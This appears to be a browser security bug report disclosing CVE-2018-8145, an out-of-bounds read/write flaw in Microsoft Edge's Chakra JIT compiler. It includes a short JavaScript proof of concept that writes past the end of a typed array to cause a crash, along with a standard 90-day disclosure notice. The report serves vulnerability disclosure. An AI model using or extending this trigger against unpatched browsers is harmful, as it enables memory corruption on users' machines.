Microsoft Edge: Chakra: JIT: OOB reads/writes CVE-2018-8145 It seems that this issue is similar to the issue 1429 (MSRC 42111). It might need to refresh the page several times to observe a crash. PoC: let arr = new Uint32Array(1000); for (let i = 0; i < 0x1000000; i++) { for (let j = 0; j < 1; j++) { i--; i++; } arr[i] = 0x1234; } This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt